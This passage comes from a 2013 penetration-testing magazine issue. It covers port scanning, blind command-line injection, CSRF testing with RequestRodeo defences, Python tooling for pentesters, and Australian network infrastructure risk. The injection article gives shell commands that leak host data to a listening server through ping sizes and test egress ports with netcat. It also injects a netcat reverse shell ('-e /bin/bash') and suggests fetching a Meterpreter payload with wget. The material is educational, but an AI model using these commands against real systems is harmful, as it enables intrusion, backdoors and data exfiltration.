RST when you send a SYN/ACK instead of a SYN
or feel the TCP/IP theory is lacking I recommend
reading TCP/IP Illustrated I, II and III by Richard
Stevens, they are the best books on the subject.
Scanning is highly underrated, it is the first step
to gather information on the network while on a
hands on basis, it reports open ports, operating
systems, filtered ports, if there are any firewalls,
how are they done and which are they own policies, etc.

A good scan is as good as half of the penetration
on the machine, having reliable information is basic for analyzing the host and not underestimating
it or overestimating it.

Enrique Sanchez

Enrique Sanchez is a member of the Accuvant LABS Enterprise Attack and Penetration Testing team. Enrique has
over 14 years of experience in Computer Security working with industries including pharmaceutical, healthcare,
bank, government, gaming and others. Enrique is a writer in various blogs such as question-defense.com and security-dojo.com. His main interests range from reverse
engineering, exploit creation, Artificial Intelligence, Neural Networks and robotics to music, horses, video games
and writing various technical papers.

Listing 18. hping sending udp packets to port 53 and port 111
root@fscking:~# hping --udp -n 192.168.132.2 -p 53 //We are sending UDP to port 53
HPING 192.168.132.2 (eth1 192.168.132.2): udp mode set, 28 headers + 0 data bytes
ICMP Port Unreachable from ip=192.168.132.2
ICMP Port Unreachable from ip=192.168.132.2
ICMP Port Unreachable from ip=192.168.132.2
ICMP Port Unreachable from ip=192.168.132.2
ICMP Port Unreachable from ip=192.168.132.2
--- 192.168.132.2 hping statistic --5 packets tramitted, 5 packets received, 0% packet loss
round-trip min/avg/max = 0.0/0.0/0.0 ms
root@fscking:~# hping --udp -n 192.168.132.2 -p 111
HPING 192.168.132.2 (eth1 192.168.132.2): udp mode set, 28 headers + 0 data bytes
--- 192.168.132.2 hping statistic --8 packets tramitted, 0 packets received, 100% packet loss
round-trip min/avg/max = 0.0/0.0/0.0 ms
root@fscking:~#

Listing 19. nmap doing a UDP scan
root@fscking:~# nmap -sU -n 192.168.132.2
Starting nmap V. 3.00 ( www.insecure.org/nmap/ )
Interesting ports on (192.168.132.2):
(The 1467 ports scanned but not shown below are in state: closed)
Port
State
Service
111/udp
open
sunrpc
Nmap run completed -- 1 IP address (1 host up) scanned in 3 seconds

StartKit 01/2013(01)

Page 44

http://pentestmag.com

Au dit Fir e wa l l s , S w i t ch e s & Router s a nd pr oduce e x per t l e vel r epor t s

Device Support
Nipper Studio can audit over 100
different network device types. This
includes a range of devices from
the major manufacturers such as
Cisco, Juniper & Checkpoint as well
as many, many more. We are adding
support for new devices all the time.

Quick to Implement
Unlike server based systems which
require installation and higher
maintenance overheads, Nipper
Studio can be downloaded from our
website and installed in minutes.

Licensing
Nipper Studio is licensed per device.
Licenses can be managed centrally
or split between multiple auditors,
clients or sites.

Continuous Monitoring
Nipper Studio can be scripted
to integrate into a continuous
monitoring system, or used for point
in time auditing.
For fast integration with other tools
our graphical interface shares the
same library as our command line
version.

Nipper Studio- Your Expert in a Box
Nipper Studio produces expert level audit reports on your network device
configurations. You can quickly and easily monitor your network security in the
intervals between manual tests. Nipper Studio produces a report that:
1. Summarizes the security of your network devices e.g. firewalls, switches and
routers
2. Produces a detailed report which highlights the vulnerabilities in your
configurations
3. Rates these vulnerabilities by severity of threat and ease of resolution
4. Provides an easy to action mitigation plan based on your customized settings
with potential resolutions including command line fixes to resolve the issue
5. Offers an audit change tracking function, enabling you to include a change
comparison within your security audit, so you can easily view the progress of
your network security

Versatile Reporting
Networks are becoming ever more complex and you need a tool that will evolve
with your needs. Nipper Studio has been built from a real world perspective to be
as flexible as possible. Reports include management overviews, uniform views of
disparate device configurations, full security audit and compliance reports. You
can also:
1. Choose to run only the configuration audit, just the security audit or the full
report
2. Export sections of the report so you can distribute it to the appropriate people
3. Choose from a huge range of configuration options e.g. hiding passwords
within the report, applying classification information to the document and
customizing your reports throughout

ROI- Saving Time & Money

This means the settings can be
quickly applied before scripting the
tool for conditional or time based
audits.

Nipper Studio produces Penetration Test level device reports in seconds and
helps maintain expert level security analysis, reduce the risk of breaches &
lower the cost of external audits. A Nipper Studio starter pack costs only $1000
and scalable global licensing is also available. All packages offer a great return
on investment.

Contact us...
[email protected]
T: +44 (0) 1905 888785
www.titania.com

As used by

County House · St Mary’s Street · Worcester WR1 1HB · UK

N-OVE-0313-US

POTENTIAL ATTACKS & DEFENsE METHODS

Blind Command Line
Injection
Blind Command Line injection (BCLIi) is when a web application
allows operating system commands to be executed through it with no
confirmation of execution. BCLi is typically on found on poorly coded
applications that allow access to files or data through a web interface.
If these hosts are Internet facing, the injected code could result in the
compromise of the De-Militarized Zone (DMZ) and eventually the
internal network. Identification of a location that could potentially yield
BCLIi is difficult.

T

his is due to the lack of execution confirmation and the limited intelligence of where the
server side code accesses a local resource.
Locations that may have BCLIi usually have access to system resources or commands through either GET or POST requests. The first step is to determine if the base operating system is Linux, UNIX or
Windows. There are many ways to do this, and those
methods will not be covered here. The next step is
to determine if the potential Command Line injection
(CLIi) is present or not; and if it is present, it is Blind.
Appending a semicolon to the location of the command with an “ls” command in Linux or “dir” command in Windows will provide one of three results.
Result one (1), the page will display the results
of the data within the actual web session proving
that the system is vulnerable to CLIi and it is not
Blind injection. Result two (2), the web server will
not respond to the screen but may have processed
the command. Result three (3), the command was
properly ignored or discarded. This example will
use Internet Control Message Protocol (ICMP)
echo packets to return the results of injected commands. Many organizations block ICMP from external sources, but often allow ICMP echo that
originate inside the internal network.
This example requires a few things: the target
host must be Linux, ICMP echo requests have
StartKit 01/2013(01)

to be authorized to leave the network and netcat
has to be installed on the system. There are ways
around each one of these conditions if they cannot
be met but they are not shown below. Lastly, all injected commands must be Uniform Resource Locator (URL) encoded to prevent illegal characters
from being dropped.
So as a Penetration Tester you have found a potential injection point but no results for each tested
command that is received. There are two possible
solutions to grab a return confirmation, one is to
use ICMP echo packets of different byte sizes to
return positive and negative acknowledgements to
those commands. The other solution is to change
the pattern returned in the ICMP echo request with
the “-p” argument. This example utilizes the differential byte size attack due to some Intrusion Detection Systems or Intrusion Prevention Systems
(IDS/IPS) configurations that may flag the ICMP
echo request with pattern changes. Tcpdump is
utilized to catch results sent to the listening server.
In the code examples following the code execution location will be donated by either “attacker@
pentest:~#” or “victim@pentest:~$”. The “attacker”
identifies the listening server while the “victim” denotes the BCLIi vulnerable web application.
Listing 1 shows how to setup tcpdump on the attacker’s machine to catch ICMP echo packets.

Page 46

http://pentestmag.com

Listing 2 shows the injectable ping command
which will modify the default data packet size from
fifty-six (56) to fifty-seven (57) and be sent to the
listening server. This will ping the listening system
with a packet that has a data size of fifty-seven
(57) bytes and a header of eight (8) bytes. The total size of the packet will come out at sixty-five (65)
bytes and confirm two (2) things. If this is received
then it is confirmed that ICMP echo requests can
be sent and that BCLIi is possible. Figure 1 shows
the injected ping into the target web server.
Figure 2 shows a packet with a 65 byte length
that was received which confirmed the presence
of a BCLIi. Now that the blind command injection
has been confirmed, the tester has to determine if
a utility is already present to create a back door.
Next, the Penetration Tester has to determine if
netcat is present on the target system. A “which”
command finds out if netcat is installed and returns
a true or false. The return of a true result causes
a one (1) byte larger ping to be sent, while a false
result returns a standard ping to be sent to the listening server. Listing 3 and Figure 3 show the command and the injection of the command that determines if netcat is installed on the target system.
Figure 4 shows the increased packet size of sixty-five (65) bytes which represents a true positive,
or the installation of netcat.
The next injected command will list the listening
ports the target server has “open” behind the Internet facing firewall. All too often, a firewall has
been configured to allow egress traffic out ports
that an internal device may listen on. An example
of this would be the authorization of web servers to
browse the Internet over port eighty (80).
To verify which ports are open, a number of ICMP
echo request packets will be sent with the byte size
padded with the bytes equal to the port number. As
an example a listening port of eighty (80) will return

a packet of one hundred and forty-four (144). This
comes from the default packet size of fifty-six (56)
bytes plus an eight (8) byte header, and eighty (80)
bytes of padding. As a safety precaution to prevent “Ping of Death” alerts from being triggered all
combinations that come to 65527 in size or more
will be dropped. This precaution only eliminates a
few ports that are ephemeral or random in nature
and should not have listening services attached to
them anyway. To capture this traffic, tcpdump has
to be restarted with the extra argument and option
to dump the data to a packet capture (pcap) output
file called, as shown by Listing 4.
The netstat command as shown in Listing 5, will
be injected into the target server to pull the unique
listening port numbers and send them to the listening server by ICMP echo.

Figure 1. Injection of Modified Ping Command

Figure 2. Confirmed BCLIi Through a Differentiation of ICMP
Echo Request Packet Length

Figure 3. The Command Injected To Determine the Presence
of netcat

Figure 4. The Port Forwarder netcat is Installed

Listing 1. Capture ICMP Echo Requests with tcpdump
sudo tcpdump icmp[icmptype]=icmp-echo -vvv -s 0 -X -i any

Listing 2. Command to Send an ICMP Echo Request of a Slightly Larger Size
ping -c 1 -s 57 <listening server>

Listing 3. This Command Determines If netcat is Installed on the Target System
which nc | grep "/nc" | if [ $? -eq 0 ] ; then ping -c 1 -s 57 <listening server> ; else ping -c 1
-s 56 <listening server> ; fi

StartKit 01/2013(01)

Page 47

http://pentestmag.com

POTENTIAL ATTACKS & DEFENsE METHODS
Figures 5 and 6 show the injected command will determine which ports are listening on the target server,
and the tcpdump capture of the associate packets.
Once these packets are captured the results can
be parsed to determine which ports are actually listening. Load the tcpdump file and awk out the data
for the packet length. Remove the standard ping
packet size from the packet length and dump the
data to a text file. The final results will return the
listening ports found on the target server, the command to do this is in Listing 6.
This data will show the actual ports that are listening on the web server behind the firewall.
These ports also may not have been correctly configured to prevent initiation on the web server side.

Figure 5. BCLIi Command to Discover Listening Ports

Figure 6. The Capture of Fourteen (14) Packets

Figure 7. Shows Ports Discovered

These ports are a starting point to determine if connections can be egressed out through the firewall
to the target listening host. Figure 7, shows the listening ports discovered.
Now that the potential open ports have been determined, netcat will be used to connect to the listening server on each of those ports. When it connects, a message will be sent to signify which ports
can make it through with data. To capture all the
message details the tcpdump listener has to be
adjusted to capture traffic from the target server to
the listening server, as shown by Listing 7.
Listing 8, shows the injected command that will
iterate through the list of ports that were discovered open and echo a greppable message “Mark
port #” to the listening server. This restricted list of
ports is used instead of a range at first because it
is stealthier and less likely to be caught. If this did
not work blocks of ports could be tested in a range
fashion. These techniques are utilized to prevent
an IDS/IPS solution from detecting the outgoing
port queries.
Figure 8, shows the injected command used to iterate over the possible ports that might be granted
external access. Listing 9, how to read and grep
the data out of the pcap file based on the “Mark
port” flag to determine which ports can be communicated on. Once the egress ports have been
verified, a back door into the system can be setup.
Figure 9, shows the egress ports discovered.
Listing 10, shows how to setup a netcat listener
that will accept connections to it. This is so that da-

Listing 4. The tcpdump Command to Capture ICMP Echo Requests Into a pcap
sudo tcpdump icmp[icmptype]=icmp-echo -vvv -s 0 -X -i any -w /tmp/listening_ports.pcap

Listing 5. BCLIi Command to Determine Listening Ports
netstat -lntp | grep LISTEN | awk '{print $4}' | cut -d: -f2 | grep -ve "^$" |sort -u | while read
line ; do TOTAL=$(($line + 56)) ; if [ "$TOTAL" -lt "65527" ] ; then ping -c 1 -s
$TOTAL <listening server> ; fi ; done

Listing 6. Command to Read Contents of pcap and Find Egress Ports
sudo tcpdump -r /tmp/listening_ports.pcap |awk '{print $14}'|while read line; do PORT=$(($line-64))
&& echo $PORT >> /tmp/ports.txt ; done

Listing 7. The Command to Grab Egress Connection Messages
sudo tcpdump -vvv -s 0 -X -i any 'src host <target server>' and 'dst host <listening server>' -w /
tmp/egress_ports.pcap

StartKit 01/2013(01)

Page 48

http://pentestmag.com

ta can be exfiltrated from the target system. Listing 11, provides the injection for the backdoor onto
the target system. What the below command is designed to is send a connection back to the listening server over the specified port. Once access has
been established, the Bourne Again Shell (BASH)
interpreter will accept commands through the listening service on the attacker’s machine. Figure 10,
shows the injection in action. Access to the system
has been granted as shown by the Figure 11.

From here multiple attack avenues can be taken to further compromise the DMZ and eventually the internal network. One of the simplest methods would be to setup an internet facing web server
owned by the attacker. On that web server would be
a pre-built Linux Meterpreter payload that had an
egress port configured that was determined accessible by the previous reconnaissance, but different
than the netcat shell that is in use. The file could be
downloaded on to the compromised host with the
wget application. Once the payload was executed
on the compromised host, further attacks and pivots
into the network would be greatly simplified.

Figure 8. The Injection of The Egress Connection Test

Chris Duffy

Chris Duffy is currently the Lead Penetration Tester of Knowledge Consulting Group. He has held a number of Information Technology and Security positions such as Cyber Warfare Specialist, Senior Systems Engineer, Senior
Systems Administrator, Conventional
Systems Maintenance Supervisor, Network Infrastructure Supervisor, Cryptographic Technician, Satellite Communication (SATCOM) Technician and
SATCOM Operator. He has attained three degrees a M.Sc.
Information Security and Assurance, a B.Sc. Computer Science, and an A.A.S Electronic Systems Technology.
He has earned a number of certifications which include
eCPPT, CEH, CNDA, CHFI, EDRP, GSEC, G2700, CWSP, CWNA, VCP, RHCT, CIW:SP, CIW:WSS, CIW:WSE, CIW:WSA,
CIW:WFA, CIW:A, BAIS, Security+, Network+, A+, NSTISSI
No 4011, NSTISSI No 4012.

Figure 9. The Results of the Grepped Data

Figure 10. The Injection of The Backdoor Start-up

Figure 11. The Interaction with The Backdoored System

Listing 8. The Command Injected to Determine Which Ports Can Connect Out
for line in 139 22 25 3000 3001 3790 443 445 16352 53 5432 587 631 7337 80 8307 9000 902; do echo
“Mark port $line”|nc -nx <listening server> $line ; done

Listing 9. The Command to Grep Out The Egress Connection Message
sudo tcpdump -r /tmp/egress_ports -X|pcregrep -M 'Mark.port\n.*'

Listing 10. The Command to Start a netcat Listener on The Waiting Server
sudo nc -l -p <port number>

Listing 11. The Injected Command to Start a Backdoor
nc -v 192.168.75.171 <port number> -e /bin/bash

StartKit 01/2013(01)

Page 49

http://pentestmag.com

POTENTIAL ATTACKS & DEFENsE METHODS

CSRF Testing
and its Protection Using RequestRodeo

Cross Site Request Forgery (CSRF) is one of the most common
attacks on the Internet today. The attackers find it easy to exploit
it as it does not require any authentication information, session
cookies but only the user to be authenticated to the application.
Furthermore, it is possible on every platform and it does not
matter which authentication type application uses.

C

SRF:-Cross Site Request Forgery is an attack that enables the adversary to execute
malicious requests from different domains
or from the same domain (if stored CSRF there) in
order to perform unwanted actions without the user knowledge. This request automatically includes
authenticated data, such as session information or
http authenticated credentials. This requires having
prior access and knowledge of vulnerable applications. The purpose of CSRF Attack is to exploit implicit authentication. If our session is active and we
clicked any forged link which contains malicious request then it will automatically include our authenticated data/session information and make this http
request valid because of implicit authentication.
Implicit authentication can be done using 4 ways:

MAC, without entering username and password
(Figure 2).

HTTP Authentication

There are 3 types of HTTP Authentication: NTLM,
Basic, Digest.

Client Side SSL

X.509 Certificates and digital Signature are used
for authentication.

Cookies

Server sets a cookie to the client web browser (found in response header mentioned as “Set
Cookie” field ) and after that, this cookie goes in
each request and now if the server finds this valid
cookie, it treats the request as valid and, thus, authenticates the user (Figure 1).

IP Based Authentication

This authentication is used generally on intranet
infrastructure. Authentication is done with only IP/
StartKit 01/2013(01)

Figure 1. Cookie Based Authentication

Page 50

http://pentestmag.com

Types of CSRF

There are two types of CSRF attack: Reflected
CSRF and stored CSRF.
In Reflected CSRF vulnerability, the attacker uses a system outside the application to perform this
attack and provide exploit link to victim.
In Stored CSRF attack, the attacker uses itself
the application which is vulnerable to CSRF attack
to provide the victim exploit link in order to perform
desired action.

Login CSRF

Sometimes attacker creates a forge link using his
own username and password. The main purpose
of this is to obtain the idea about victim's interests
and activities which help attacker in further attacks. An attacker can also view the search history by making the users to log in as an attacker
i.e. the victim visits the attacker’s site in which he
stored the Google’s login malicious link, causing

the victim to be logged into Google as the attacker
and now all his web search will be stored in the attacker’s search history.

Example

There is a website xyz.com which allows registered
users to post HTML messages as global messages (like scraps in orkut). This site is not performing
input sanitization for the posted messages. So we
can say this website is vulnerable to stored CSRF.
If an attacker post any malicious link then any user
who clicks on that link will be infected with the desired malicious script action. A simple example of
this attack can be illustrated by a situation when an
attacker creates a logout link and posts that link in
scrap, then every user will logout whenever he will
click that link.
<IMG SRC=”http://xyz.com/globalzone/logout/logout.
php” width=”0” height=”0”/>

Figure 2. IP Based Authentication
StartKit 01/2013(01)

Page 51

http://pentestmag.com

POTENTIAL ATTACKS & DEFENsE METHODS
How to Test CSRF in an Application
(Practical Scenario)

Step 4

Step 1

Let’s assume there is a web application which has
a feature“add clients”. We log in and search for a
client – you can see the bracket on the left side of
Figure 3.

Step 2

User creates a client and captures the request in
intercepting tool (like burp suite; Figure 4).

Step 3

Create an HTML page of this request (Figure 5).
Note
It may be difficult for newbies to create a HTML
page from the captured request. They can use a
tool “Pinata” to create an automatic html page.

Figure 3. Add Client feature of an anonymous application

Figure 4. Request is captured in burp proxy

Figure 5. HTML page of the captured request
StartKit 01/2013(01)

Now, log in again to the application and open the
crafted html file in a new tab on the same browser
where the user is logged in (Figure 6).

Step 5

Click the submit button and check whether the client has been added successfully or not. If it was
done successfully, then this website is vulnerable
to CSRF attack (Figure 7).

How CSRF Attack Works

An attacker creates a special page and tricks the
user into visiting it while the user is logged in to the
application. This special page triggers a request to
the application with the user's session information.
This request is used to add client. The request is
forged to look like a valid request for this operation. All the details required for the operation to
succeed are present as query-string /POST variables. When the request is sent from the victim’s
machine, valid cookies with the session information are also sent.
The application misunderstands that the request
is valid because it contains the cookies. So, the
operation succeeds without the user’s knowledge.
The special page is quite easy to create. It might
be a simple HTML page with an < img alt=" "
src=" " /> tag with the source pointing to the page
that performs the operation.

Figure 6. Submit button found after opening HTML page

Figure 7. It confirms that the Client “TESTAAAAAAAA “has
been added successfully
Page 52

http://pentestmag.com

CSRF Protection

static image URL if found suspicious otherwise
forward it to the client without any modification.
As most of web browsers don’t validate image
element attribute before processing this image
request.

For protecting CSRF a few of the defences are
available. They are categorized from developer
and end user perspective:

General CSRF Mitigation for User
• Log off when you finished using application
• Don't store username & password in a browser
• Clear all cookies after finishing your important
work/transactions
• Use browser adds on like NoScript for Mozilla
Firefox
• Use multiple browser i.e. one for accessing
sensitive sites and one for other activities

General CSRF Mitigation for Developer
• Session Time-out
• Confirmation Pages like “Are you sure you
want to transfer $500 to user XYZ?”
• Captcha Implementation
• Check for referrer header
• Checking Origin header
• URL Rewriting
• Re-authentication for sensitive actions
• View State for ASP.Net
• Double Submit Cookies

Other CSRF Defences
• Secret Validation token
• Referrer Validation
• Custom HTTP Header
CSRF Defences are unable to understand this automatic inclusion of authenticated data in http request.
To prevent this automation process of including the authenticated data one can use the help of
proxy. The only problem in this solution is that it is
unable to prevent attacks that exploit client's side
SSL Authentication. In this concept proxy will sit in
between browser and server. In this way it can examine each request and response before forwarding to a server and a client. This proxy can also
modify the request and response automatically. So
we can say the proxy help us in
• Identification of malicious request
• Remote Automatic inclusion of authenticated
data in a request
• Helps to protect image based on CSRF attack
by examining the response and blocking the
StartKit 01/2013(01)

Implementation of Proxy
• In web browser (Integrated proxy directly to
web browser)
• In between web browser and server.
The proxy analyses data as it passes through
the proxy. Implementing approach 1 is time consuming and we have to integrate each and every
browser.
The second approach will work for all browsers
as it’s not integrated with any particular browser.
So, now for any transaction or any action, the request will go from our system to proxy and then to
server and vice versa. As proxy is different entity
here it will verify each and every request generated from a client's web browser.

Steps

Step 1

For legitimate request 4 conditions should be met:
• Submitting an HTML form or any other way of
interaction from webpage.
• It should follow the same origin policy.
• Destination host and path using cached credentials. Cache credentials are using for automatic login.
• Request rodeo token in a request
If above mentioned conditions are met, then request is treated as legitimate.

Step 2

Now only the legitimate request can carry the implicit authentication. Proxy intercepts each and
every http response, searches the code which
can create request .e.g. if in response, code is like
on click document. Location= any url, then it appends a unique token in the url and stored the token value and response for future response. Now
this token will receive in the next http request from
the client side. Now proxy will intercept the http
request generated from client and checks for token value.
If the request does not contain token or it does
not matches with the prior response stored to-

Page 53

http://pentestmag.com

POTENTIAL ATTACKS & DEFENsE METHODS
• Now proxy examines the
request and if validated then
forwards it to the server (Figure 8).

Figure 8. Client-Server Communication

ken then proxy removes the authentication information from the request before forwarding to the
server.
When a server receives a request without authenticated parameters it sends a 401 response to
the client for re-authentication. When a user gets
401 response code then browser prompts for username and password and after entering credentials
it automatically sends in each request and user is
totally unaware of this, so protecting this automation of submitting authentication process, proxy
sends a 302 temporary moved response and append token in the url.
If token matches then proxy treated it as valid
request and verifies the above mentioned conditions. If it also satisfies these conditions it treated
as a valid request generating from the same html
page and forward to server (Figure 8).
To remove automatic inclusion of authenticated
information server follow these steps.
• When a server founds any request suspected, it sends a 302 response and appends a request rodeo token in the url.
• Now client receives a url as a redirected response and request that url.
• Now server will receive a http request with request rodeo token value and this time it removes authentication header and sends a 401
unauthorized response to client and ask for reauthentication
• This time client reauthenticates himself and
sends an http request with request rodeo token.
StartKit 01/2013(01)

IP Based Authentication
IP Based Authentication is a
technique which is generally used in intranet infrastructure. It uses client MAC or
IP as authentication token.
For IP Based authentication
scheme, proxy implements a
reflection server which is used
to determine whether an IP
Based authentication is used
or not. This reflection server is
always placed in front of the
firewall.
Whenever a proxy found
any suspicious request it sends to reflection server for verification and then reflection server verify this request as legal request based on the response received by the server after manipulating
the HTTP method to HEAD request. If response
is OK, it means IP based authentication is not running and it sends this response to proxy and then
proxy treats it as an illegal request and stores this
response for future use until the user IP address is
the same.
Reference
Owasp Requestrodeo Project.

Nitin Goplani

Nitin Goplani has been working with Aujas as a Security Researcher in the Telecom Security domain. With a
rich background in application, Mobile and network security, Nitin is now involved in researching about new
and emerging threats to the Telecom Core Nodes. Apart
from Research, Nitin is also involved in assisting in the
implementation of security measures for Fixed/ Mobile
Network (2g/3G/LTE) and core fixed network systems to
regulate access to specific network elements for the secure operation of the core fixed network and all its variants.

Page 54

http://pentestmag.com

Horst Görtz Institute for IT Security
Interdisciplinary Research

Network for IT Security
nrw-units strengthens companies in NRW by boosting networking along
the whole value-added chain, accomplish user companies and stimulate cooperation between economy and research. Another aim is to enlarge the leading position of companies and research institutes in Europe and develop the national and international visability in IT security
sector. Partners in nrw-units are the Horst Görtz Institute for IT security, eco - Association of the German Internet Industry and networker
NRW e.V. nrw-units is funded by the Ministry for economy, energy, industry, medium-sized businesses and trade and the European Union.
Become a units-member!

www.nrw-units.de

Open Position: Post Doc
The German Research Foundation awarded more than €4 million to
the HGI for the establishment of the interdisciplinary research training
group “New Challenges for Cryptography in Ubiquitous Computing”.
We are looking for candidates with an outstanding Ph.D. in computer science, electrical engineering, mathematics or a related areas.
Apply now!

www.ubicrypt.org

ITS.Connect 2013
We connect graduates and companies.

June 28, 2013
Bochum, Germany
Germany‘s unique IT Security Recruiting Exposition

Whether business or science, employer or graduate, here starts the way into your future. This is
where innovative minds and good graduates who make the digital world of tomorrow a little safer,
meet employers with exciting challenges.
Take part and start your future now.

www.hgi.rub.de/itsc2013
Horst Görtz Institute for IT Security | Ruhr-University Bochum | Dr. Nina Winter |
Scientific Coordinator | www.hgi.rub.de | [email protected]

POTENTIAL ATTACKS & DEFENsE METHODS

Python for Coders
and Pentesters
A word that needs no introduction for InfoSec coders
Python programming language was gift to Web world by Guido
van Rossum. Most of the time InfoSec evangelists need to write
their Proof Of Concept [POC], we need to automate our attacks
or customize some of our tools and these tasks can create a lot of
headaches.

T

he solution to these problems can be a simple PY file. Easy to learn syntax and a huge
set of third party libraries can simply solve
our problems and the best part is that python is
open source.

Target Audience

I would like to welcome all the coders as well as
pentesters. The welcome of coders seems to be
obvious but pentesters might be wondering about
the reason why they are welcome. This is to enable new pentesters (particularly those who are not
considered as ninjas in coding) to learn the implementation of a various tools that are already created. The best part is our favorite Operating System
(BackTrack) which is already enriched with scripts
written in this language.

Scope

Most of the time when I write, read or learn any
language or technology, the very first question that
arises in my mind is the Scope of the assets. With
my experience in Information Security, Python is
one of the best languages for automation or for creating our new tools. If you are interested in working
with Java, .net, Game Development, Web application development, Socket programming, scripting,
GUI and IT security programming, the Python can
StartKit 01/2013(01)

be a one word answer. I would suggest visiting
http://www.python.org at least once.

Hardware/Software Requirements

There are no hardware requirements for the interpreter of this language, although there are many
software setups that you may prefer to play with.
A platform that I recommend most of the time is
Linux. But Windows platform will do as well. For
Linux users, you already are equipped with this
weapon, just type python on your terminal. For
Windows you will need to install it manually.

Understanding with a Real Case Study
Example for Coders

It would be very helpful for a coder to create a
powerful web-spider with just a few lines of code.
Most of the time searching for online information
about the client is painful and it would be helpful
for us if someone can automate this task for us.
Usually a few lines of code in PHP or in java can
do it but with Python we can make it much more
easy (Listing 1).
Most of the code lovers will notice that the task of
finding links and descriptions about a web based
application can be simplified by this fifteen line
script. Not only this, but also SQLmap can be added. Output from this script can be fed into SQLmap

Page 56

http://pentestmag.com

so that all these links can be checked for SQL injection vulnerability.

Example for Pentesters

Now, I would also like to discuss some examples
for pentester, too. BackTrack Operating System is
Listing 1. Web-spider code
import urllib
from bs4 import BeautifulSoup
def processURL(url):
    httpResp=urllib.urlopen(url)
    if httpResp.code==200:
        print(url)
        html=httpResp.read()
        bs=BeautifulSoup(html, "lxml")
        links=bs.find_all('div', {'class' :
'three-quarter'})
        title=links[0].find_all('div', {'class'
: 'link'})
        title=title[0].text.strip()
        desc=links[0].find_all('a')
        desc=desc[0].text.strip()
        print('\tTitle: ' + title)
        print('\tDescription: ' + desc)
        print('\n\n')

Figure 1. TheHarverster script

full of various useful python scripts that can be directly applied to our pentesting purpose.
One of the very useful aspects of any pentesting starts with "Information gathering" but most of
the pentesters try to skip this step. I would highly recommend to spend most of your time on this
step. Let's make use of Python to speed up the
process. The script that I'll talk about is well known
as TheHarverster and is available in /pentest/
enumeration/theharvester directory of backtrack.
For the purpose of this article I am using BackTrack 5, revision 2 (Figure 1).
I would appreciate if you would like to open this
script and give it a try to understand it. But at this
point, I have done a quick example on my own
website to demonstrate you, how easily we can
gather details about any website using this script
(Figure 2).
The command used in this script is:
./theHarvester.py -d any-example-website.com
-l 100 -b google

There are many useful scripts in this OS and many are available on google search as well.

Path to go Further and Conclusion

All the things considered, I would like to state that
every pentester should have a little knowledge
about this great language. Backtrack Operation
System itself has got a few sets of python code directories in it, so it can be used for future editions.
Tools like dnsrecon, goofile, metagoofil are just a
few examples that can help us a lot.
Apart from these built in tools, you can import
third party libraries to perform a variety of tasks.
For the purpose of performing a forensics on an
android platform please visit: https://code.google.
com/p/androguard/. If you are used to write fuzzing
programs you will need Python library that can be
downloaded from here: https://bitbucket.org/haypo/fusil/wiki/Home. This is just a start for a python
InfoSec coder, lots of DDOS attacks and wireless
battles can be won with weapon.

Hitesh Choudhary

Figure 2. TheHarverster script demonstration
StartKit 01/2013(01)

Hitesh Choudhary is ethical hacker from India serving
free to Rajasthan police to handle cyber crimes as well
as pursuing his wireless research at M.I.T., California. He
has completed his RHCE, RHCSA, CEH and various other
security certifications. His recent work for the code society can be seen at www.EduacationTube.net.
Page 57

http://pentestmag.com

LET'S TALK ABOUT SECURITY

Penetration Resting
a Nation
Is Australia Safe from Attack?
This article looks at some of the wider issues related to penetration
testing and security – the “A” (availability) in the CIA security
triad – and how an attack on inadequate national infrastructure
could impact a global system. It considers threats in terms of
terrorist attack and bandwidth availability, and how the national
infrastructure would respond in a crisis; using Australia as an
example.

F

ailure mode event analysis was used to
highlight some of these issues and the author has personally visited the sites discussed. The author has recently had to do this
investigation on multiple occasions with Australia
hosting components of a global system, and has
personally experienced many 24 hour days recovering from failures in the areas of concern; so the
potential issues facing this beautiful country and
its wonderful people are used as a very real and
pertinent example. Hopefully, this publication will
prompt action by the Australian government – and
the offer of free help from the author still stands;
and hopefully the good friends of the author who
work in this area won’t be offended .

Why Look at the National Infrastructure in
Relation to Security?

In 2011 whilst running infrastructure upgrades
and disaster recovery (DR) testing in Canada for
a system that is now part of the core of a wellknown international money transmission company
a global system failure occurred at the same time
as planned failover to the DR infrastructure took
place. Essentially, users from Australia and New
Zealand were unable to access the system in Canada at all, and there were some performance issues with users in Europe accessing the system.
StartKit 01/2013(01)

Initial thoughts from most support people pointed
to the failover to DR being the issue, but the difference in behaviour from different regions with this
global system – with users in North America experiencing no issues whatsoever – suggested a more
complex issue that required understanding.
Phone calls to the support teams in Australia
to investigate seemed to have issues, but eventually a traceroute was obtained and this showed
packets going into a core shared environment exiting the ISPs in Sydney and then either timing out
when transmitted under the ocean or taking several seconds to traverse the pacific. Investigation of
the European issues showed some unrelated networking problems that were related to a accessing
different target server, and some issues also related to access to data in Australia and New Zealand.
The key to identifying the issue was the traceroute showing delays into the Reach network, and
even with additional cables going elsewhere the
impact was significant on the application.
Normal connectivity between Australia and the
UK has a latency per packet of 300ms and around
250ms to the US; with the time taken consisting of
a combination of the near speed of light photons
traversing the fibre optic cables under the ocean
and the requirement to regenerate the signal every
hundred or so km. These limitations on the cables

Page 58

http://pentestmag.com

are due to physics laws rather than implementation, and to use the words of a famous fictional engineer: “I canna change the laws of physics”.
With satellites these limitations are even worse,
with the time taken to travel the approximately
36,000km up to a geostationary satellite and back
of 250ms and then with the additional distance between satellites at this distance each packet may
take a second or more to traverse between continents. For low earth orbit satellites the latency is
less, but these move relative to the ground so internet connectivity is less predictable. For SSL there
are several protocol related packets that must be
exchanged synchronously before the data itself is
sent (Hello Server, Hello Client, What security do
you support server, what security can you use client, etc) so with several seconds potentially to use
a satellite to just set up an exchange timeouts are
likely to occur affecting the likelihood of successful
application use and telephony via satellite. So, if
the backup for the submarine cabling is satellite it
is likely many business applications would backup
and fail. In country applications, however, would
not be affected.
Consider what happened in 2008 and 2011 when
multiple submarine cables were cut by ships dragging anchors, and the attempted cut of multiple cables in Egypt in 2012. The Internet slowed down
in regions and connectivity was almost completely
lost. So, if a slowdown can cause disruption of a
system consider what would happen if the cables
into Australia were cut; particularly as they mostly
go into one place. Would the backup connectivity

cope? Most likely global systems, such as critical
finance systems, and telephony would be disrupted with major impact to the national economy and
the systems of large corporations.

What Infrastructure is in Place?

Australia currently uses 3.4 Tbps of bandwidth on
its cables connecting to the rest of the world through
the five cables coming into Sydney of the Southern Cross Cable Network, Australia-Japan Cable,
Telstra’s Endeavour, Pipe Networks PPC-1, and
SeaMeWe-3; all of which are not at capacity but
all of which connect into the east coast of Australia in Sydney. A single, lower capacity older cable
connects into Western Australia and on up to Singapore. Whilst capacity can be upgraded on these
existing five links in Sydney via upgrades to the
equipment at the endpoints, what can’t be fixed with
upgrades to these cables is resilience due to them
